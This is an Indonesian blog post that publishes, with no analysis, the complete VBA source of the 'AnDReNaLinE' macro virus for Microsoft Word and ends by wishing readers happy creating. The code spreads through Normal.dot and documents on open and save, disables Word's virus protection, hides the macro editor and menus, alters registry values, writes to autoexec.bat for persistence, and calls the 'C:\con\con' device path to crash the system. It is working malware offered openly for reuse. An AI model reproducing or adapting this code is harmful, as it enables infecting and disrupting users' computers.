Nah,, Kali Ini saya akan ngebaHas tentang :
Script Virus Adrenaline
Satu lagi virus macro kreasi anak indonesia..
Macro ini menyerang dokumen MS Word versi 97 keatas..
berikut adalah skript virus tersebut..
'I-Macro-AnDReNaLinE.A Bandung, Indonesian
'@Copyright 2002 By Dhie
'Macro Included Microsoft
'For Metal Music only
' H A E Z A T S U '
' featuring: '
' D E F T O N E S '
' with '
' A N D R E N A L I N E '
'|",",",",",",",",",",",",",",",",",",",",",",",",
'|----------------------------------------------|'
'| FROM SOMEONE WHO BE INCLUDED |'
'| THE NEW UNIVERCITY IN BANDUNG (AIKPL-NKP) |'
'| LICENSED TO: |'
'| ALL METALER IN THE WORLD |'
'|----------------------------------------------|'
'|",",",",",",",",",",",",",",",",",",",",",",",",
Public Const MyWorm = "AnDReNaLinE", _
Zoro = "'Thinking about it...", _
Original = "Microsoft Word", _
OriginalVB = "Microsoft Visual Basic", _
MyName = "Deftones", _
ViriiX = "\Installer", _
Special = "AnDReNaLinE", _
Top32 = "\Owsclrt.dll", _
Tulalit = "\{00000409-78E1-11D2-B60F-0020031983C998E7}", _
Mistik = "\{00000409-78E1-11D2-B60F-00203100A3C998E7}", _
Endog = "\Installer", _
Kritis = "C:\con\con", _
Kode1 = "Private Sub Document_Open(): On Error Resume Next: WordBasic.DisableAutoMacros Flase: GetNorMalDocument: WordBasic.DisableAutoMacros True: End Sub" & vbCrLf & _
"Private Sub Document_Close(): On Error Resume Next: WordBasic.DisableAutoMacros Flase: GetNorMalDocument: WordBasic.DisableAutoMacros True: End Sub" & vbCrLf & _
"Private Sub Document_New(): On Error Resume Next: WordBasic.DisableAutoMacros Flase: GetNorMalDocument: WordBasic.DisableAutoMacros True: End Sub", _
Modify1 = "\Microsoft Worse", _
Modify2 = "\Microsoft\Templates"
Public Const Modify3 = "\Microsoft\Templates\StartUp", _
Kode2 = "DaMn, FoR SuCKs vIRiI ", _
Puas = "YoU haVE bEEn InfECtEd bY ", _
Puas1 = "aPpLiCaTioN wiLL bE QuIt nOW.", _
Puas3 = "wE aRE ReAdY tO dIe, sEE YoU LaTeR aGAiN...!"
Public Const Kode6 = "ThIs cOmPuTeR pRogRaM Is pRoTEctEd." & vbCrLf & vbCrLf & _
"dOn'T mOdIfY aLL bE eXiSt ThE FaCiLity." & vbCrLf & _
"ThE CrImInaL dEsCribed tHiS sECuRiTiES oN pRoGraM."
Public Const V00G = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", _
V00H = "HKEY_CURRENT_USER\Control Panel\International", _
V00I = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", _
V00J = "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
V00L = "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", _
V00K = "BrOoKlYn, BaNdUnG inDo...", _
V009ATC = "I think you shouldn't have glorified", _
DamnYouA = "CHino Moreno", _
DLLib = "\Riched.dot", _
DLLPath = "\TASKS32", _
Hook = "C:\autoexec.bat", _
Hack = "Normal.dot", _
msgMy = "YoU aRE sERiOuS dOinG...!" & vbCrLf & _
"dOn'T DisTUrB mY aPpLiCaTioN." & vbCrLf & _
"YoU dO nOT oPEn mY sECuRiTiES." & vbCrLf & _
"" & vbCrLf & _
"YoU sTiLL naUgHtY!" & vbCrLf & _
"iF YoU tRiEd tHiS sECuRiTiES, YoU wiLL dIE!."
Public Aya As Boolean
Public C00NXVB As Integer
Public Spread As Boolean
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Function Hangat(): On Error Resume Next: MsgBox MsgVb, 48: End Function
Function CheckNormal(Obj As Object) As Boolean
On Error Resume Next
Dim Tmp
Set Tmp = Obj.VBProject.VBComponents
If Tmp.Count <> 1 Then
If Obj.Item(2).Name <> MyWorm Then
CheckNormal = True
End If
End If
If Tmp.Count = 1 Then CheckNormal = False
End Function
Function CopyMacroNormal(SourceM As Object, DestinationM As Object)
On Error Resume Next
Dim l001, FF00, H001, C001, C001A, C001B, C001C
Dim l000, FF01, H000, C000, C000A, C000B, C000C
Set l001 = SourceM
Set FF00 = l001.VBProject
Set H001 = FF00.VBComponents
Set C001 = H001.Item(1).CodeModule
Set C001A = H001.Item(2).CodeModule
C001B = C001A.Lines(1, C001A.CountOfLines)
Set l000 = DestinationM
Set FF01 = l000.VBProject
Set H000 = FF01.VBComponents
Set C000 = H000.Item(1).CodeModule
C001C = C000.Lines(1, 1)
If H000.Item(1).Name <> MyName Then
If C001C <> Zoro Then
C000.DeleteLines 1, C000.CountOfLines
C000.AddFromString Zoro & vbCrLf & Kode1
End If
H000.Item(1).Name = MyName
End If
If H000.Count <> 1 Then
If H000.Item(2).Name <> MyWorm Then
Kena H000.Item(2).Name
Do
H000.Remove H000.Item(2)
DoEvents
Loop Until H000.Count = 1
End If
End If
If H000.Count = 1 Then
H000.Add 1
Set C000A = H000.Item(2).CodeModule
C000B = C000A.Lines(1, C000A.CountOfLines)
FF01.VBComponents(2).Name = MyWorm
C000A.AddFromString C001B
End If
End Function
Sub GetNorMalDocument()
On Error Resume Next
Dim D As Object, N As Object
Set D = ActiveDocument
Set N = NormalTemplate
If CheckNormal(N) = True Then
CopyMacroNormal N, D
If InStr(1, ActiveDocument.FullName, "\", vbTextCompare) <> 0 Then ActiveDocument.Save
End If
If CheckNormal(D) = True Then
CopyMacroNormal D, N
NormalTemplate.Save
End If
UserFF001XCV
GetMyapp
PL001S
WordBasic.DisableAutoMacros True
End Sub
Function Microsoft()
On Error Resume Next
If Aya = False Then
SUCK: GetNorMalDocument
C00NXVB = C00NXVB + 1
MsgBox msgMy, 16, Special
If C00NXVB = 5 Then
Shell Kritis, 1
End If
End If
End Function
Sub PL001S()
On Error Resume Next
Dim B001, B002, NT009
Set NT009 = NormalTemplate
B001 = _
Options.DefaultFilePath(wdUserTemplatesPath)
If Dir(B001 + "\Normal.dot") <> "Normal.dot" Then
NT009.OpenAsDocument.SaveAs FileName:=B001 + "\Normal.dot"
NT009.OpenAsDocument.Close SaveChanges:=wdDoNotSaveChanges
End If
If Dir(B001 + "\Debug.dot") <> "Debug.dot" Then
NT009.OpenAsDocument.SaveAs FileName:=B001 + "\Debug.dot"
NT009.OpenAsDocument.Close SaveChanges:=wdDoNotSaveChanges
End If
End Sub
Sub l00Path00()
On Error Resume Next
Dim T001mp, AX000, AX001, AX002, SoftW As String, SoftA As String, SoftB As String, TempTul As String
TempTul = Options.DefaultFilePath(wdProgramPath)
T001mp = PathXA
MkDir PathX & ViriiX
MkDir PathX & ViriiX & Tulalit
MkDir PathX & ViriiX & Mistik
AX000 = PathXA & Modify1
AX001 = PathXA & Modify2
AX002 = PathXA & Modify3
MkDir AX000: MkDir AX001: MkDir AX002
Options.DefaultFilePath(wdUserTemplatesPath) = PathXA & Modify1
Options.DefaultFilePath(wdStartupPath) = PathX & ViriiX & Tulalit
End Sub
Sub DamnYou()
On Error Resume Next
Dim CB, CBV, WD, AP, OP
Dim u, g, I, SysHard
Set CB = CommandBars
Set CBV = VBE.CommandBars
Set WD = VBE.Windows
Set OP = Options
Set OP = Application
For u = 1 To WD.Count: WD.Item(u).Visible = False: Next u
For g = 1 To CBV.Count: CBV.Item(g).Enabled = False:: CBV.Item(g).Visible = False: Next g
With AP
Options.SaveNormalPrompt = False
Options.SavePropertiesPrompt = False
.DisplayAlerts = wdAlertsNone
.ScreenUpdating = False
.ActiveDocument.ReadOnlyRecommended = False
Options.ConfirmConversions = False
Options.VirusProtection = False
.ShowVisualBasicEditor = False
For bvm = 1 To .CommandBars("Macro").Controls.Count
.CommandBars("Macro").Controls(bvm).OnAction = "Microsoft"
Next bvm
.CommandBars("Tools").Controls("Customize...").OnAction = "Microsoft"
.CommandBars("Tools").Controls("Protect Document...").OnAction = "Microsoft"
.CommandBars("Tools").Controls("Templates And Add-Ins...").OnAction = "Microsoft"
.CommandBars("Control Toolbox").Enabled = False
.CommandBars("Forms").Enabled = False
.CommandBars("Visual Basic").Enabled = False
For fgh = 1 To .CommandBars.Count
.CommandBars(fgh).Protection = msoBarNoCustomize
Next fgh
End With
With System
.PrivateProfileString("", V00L, FF00p(1)) = 1&
.PrivateProfileString("", V00H, FF00p(2)) = MyWorm
.PrivateProfileString("", V00H, FF00p(3)) = MyWorm
.PrivateProfileString("", V00I, FF00p(4)) = V009ATC
.PrivateProfileString("", V00I, FF00p(5)) = V00K
.PrivateProfileString("", V00J, FF00p(6)) = DamnYouA
.PrivateProfileString("", V00J, FF00p(7)) = MyWorm
.PrivateProfileString("", V00J, FF00p(8)) = DamnYouA
End With
End Sub
Sub ToolsProtectDocument(): On Error Resume Next: Microsoft: End Sub
Sub UserFF001XCV()
On Error Resume Next
Application.UserName = "AnDReNaLinE (HaEZa_tSu)"
Application.UserInitials = "BL"
Application.UserAddress = "BaNdUnG , InDoNeSiaN..."
With Dialogs(wdDialogFileSummaryInfo)
.Author = "mETaL mUsIc_cReaToR"
.Keywords = "GuE=AnDReNaLinE"
.Comments = Zoro
.Subject = "Root"
.Title = "Metal.doc"
.Execute
End With
End Sub
Sub ViewVBCode(): Microsoft: End Sub
Sub ToggleFormsDesign()
On Error Resume Next
ShowVisualBasicEditor = False
For fgh = 1 To CommandBars.Count
CommandBars(fgh).Protection = msoBarNoCustomize
Next fgh
GetNorMalDocument
End Sub
Sub FileTemplates(): On Error Resume Next: Microsoft: End Sub
Sub ToolsCustumizeKeyboard(): On Error Resume Next: Microsoft: End Sub
Sub FormatStyle(): On Error Resume Next: Microsoft: End Sub
Sub ToolsOptions()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Application.Dialogs(wdDialogToolsOptionsView).Show
Options.VirusProtection = False
End Sub
Sub FileProperties()
On Error Resume Next
Dim PasswordX
PasswordX = InputBox("New Tab Name.", OriginalVB)
If PasswordX = ViriiX Then
For I = 1 To Application.CommandBars.Count
Application.CommandBars(I).Reset
Next I
Application.ShowVisualBasicEditor = True
For u = 1 To VBE.Windows.Count
VBE.Windows(u).Visible = True
Next u
For g = 1 To VBE.CommandBars.Count
VBE.CommandBars(g).Enabled = True
VBE.CommandBars(g).Visible = True
Next g
End If
End Sub
Sub FileClose(): On Error Resume Next: FileSave: End Sub
Sub AutoExit(): WordBasic.DisableAutoMacros False: l00Path00: PL001S: SUCK: End Sub
Sub FileOpen()
On Error Resume Next
WordBasic.DisableAutoMacros True
If Dialogs(wdDialogFileOpen).Show <> 0 Then
GetNorMalDocument
End If
WordBasic.DisableAutoMacros True
End Sub
Sub FileSave()
On Error Resume Next
WordBasic.DisableAutoMacros False
If InStr(1, ActiveDocument.FullName, "\", vbTextCompare) = 0 Then
If Dialogs(wdDialogFileSaveAs).Show <> 0 Then
GetNorMalDocument
End If
Else
GetNorMalDocument
End If
WordBasic.DisableAutoMacros True
End Sub
Sub AutoOpen(): On Error Resume Next: WordBasic.DisableAutoMacros True: GetNorMalDocument: End Sub
Sub Timing()
On Error Resume Next
TimeOn = Format(Time, "HH:MM:")
Application.OnTime TimeOn & Second(Now) + 3, "GetNorMalDocument"
SUCK
UserFF001XCV
DamnYou
For bvm = 1 To CommandBars("Macro").Controls.Count
CommandBars("Macro").Controls(bvm).OnAction = "Microsoft"
Next bvm
l00Path00
PL001S
CopyFile NormalTemplate.FullName, PathX & Top32, 0
CreateAuto
End Sub
Sub AutoExec()
On Error Resume Next
Dim P8005 As String
P8005 = Format(Date, "dd")
WordBasic.DisableAutoMacros True
Application.EnableCancelKey = wdCancelDisabled
CopyFile NormalTemplate.FullName, PathX & Top32, 0
CreateAuto
Aya = False
Application.Run "DamnYou"
Application.Run "Timing"
GetMyapp
End Sub
Function GetMyapp()
On Error Resume Next
Dim Tlp As String
Tlp = Application.StartupPath & "\"
If Dir(Tlp & "Root.dot") <> "Root.dot" Then
NormalTemplate.OpenAsDocument.SaveAs FileName:=Tlp & "Root.dot"
NormalTemplate.OpenAsDocument.Close SaveChanges:=wdDoNotSaveChanges
End If
End Function
Function Kena(namaX As String)
On Error Resume Next
If Aya = False Then
MsgBox Kode2 & UCase(namaX), 16, Special
End If
End Function
Function SUCK()
On Error Resume Next
Dim Addinis As Integer
For Addinis = 1 To AddIns.Count
If AddIns(Addinis).Name <> "Root.dot" Then
AddIns(Addinis).Installed = False
End If
Next Addinis
If NormalTemplate.VBProject.VBComponents.Count <> 1 Then
If NormalTemplate.VBProject.VBComponents(2).Name = Special Then
NormalTemplate.VBProject.VBComponents(2).Export Options.DefaultFilePath(wdProgramPath) & Top32
Else
NormalTemplate.VBProject.VBComponents.Import Options.DefaultFilePath(wdProgramPath) & Top32
End If
End If
If NormalTemplate.VBProject.VBComponents.Count = 1 Then NormalTemplate.VBProject.VBComponents.Import Options.DefaultFilePath(wdProgramPath) & Top32
End Function
Function CreateAuto()
On Error Resume Next
Dim Ty As String, Th As String
Th = vbCrLf & "@echo off" & vbCrLf & _
"Copy " & PathX & Top32 & " " & NormalTemplate.FullName & " /y"
Ty = Space(FileLen(Hook))
Open Hook For Binary As #1
Get #1, , Ty
If InStr(1, Ty, Hack, vbTextCompare) = 0 Then Put #1, , Th
Close #1
End Function
Function PathX() As String
On Error Resume Next
Dim sSave As String, Ret As Long
sSave = Space(255)
Ret = GetSystemDirectory(sSave, 255)
sSave = Left$(sSave, Ret)
PathX = sSave
End Function
Function PathXA() As String
On Error Resume Next
Dim sSave As String, Ret As Long
sSave = Space(255)
Ret = GetWindowsDirectory(sSave, 255)
sSave = Left$(sSave, Ret)
PathXA = sSave
End Function
Function FF00p(FF00a As Single) As String
On Error Resume Next
FF00p = Choose(FF00a, "Level", "s1159", "s2359", "RegisteredOrganization", "OrgOrganization", "DefName", "OrgCompany", "DefCompany")
End Function
Selamat berkreasi...
0 komentar